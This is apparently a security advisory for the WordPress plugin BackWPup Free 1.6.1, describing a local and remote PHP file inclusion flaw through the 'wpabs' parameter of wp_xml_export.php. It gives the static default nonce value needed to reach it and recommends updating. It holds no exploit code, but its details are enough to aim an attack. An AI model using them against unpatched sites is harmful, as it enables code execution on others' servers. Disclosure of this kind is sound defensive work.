WordPress Plugin BackWPup Free Remote and Local Code Execution (1.6.1)

Description

WordPress Plugin BackWPup Free is prone to a vulnerability which can be exploited to execute local or remote code on the web server. The Input passed to the component "wp_xml_export.php" via the "wpabs" variable allows the inclusion and execution of local or remote PHP files as long as a "_nonce" value is known. The "_nonce" value relies on a static constant which is not defined in the script meaning that it defaults to the value "822728c8d9". WordPress Plugin BackWPup Free version 1.6.1 is vulnerable; other versions may also be affected.

Remediation

Update to the latest version

References